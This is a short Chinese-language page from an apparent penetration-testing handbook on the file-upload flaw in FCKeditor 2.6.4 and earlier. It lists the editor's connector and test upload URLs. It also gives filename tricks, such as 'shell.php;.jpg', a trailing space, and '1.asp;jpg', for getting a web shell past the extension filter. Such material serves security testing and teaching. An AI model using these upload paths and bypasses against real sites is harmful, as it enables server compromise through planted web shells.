1.7.2.1 fckeditor<=2.6.4文件上传漏洞

上传地址

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp
FCKeditor/editor/filemanager/browser/default/connectors/test.html
FCKeditor/editor/filemanager/upload/test.html
FCKeditor/editor/filemanager/connectors/test.html
FCKeditor/editor/filemanager/connectors/uploadtest.html

漏洞利用

我们上传的文件例如：shell.php.rar或shell.php;.jpg会变为shell_php;.jpg这是新版FCK的变化。

提交1.php+空格就可以绕过去所有的,

asp绕过：

上传asp凉凉，1.asp;.jpg凉凉，因为fck2.6.4版本会重命名为1_asp;.jpg

上传1.asp;jpg上传成功

Previous1.7.2 fckeditor编辑器漏洞 Next1.8 URL Redirect漏洞

Last updated 5 years ago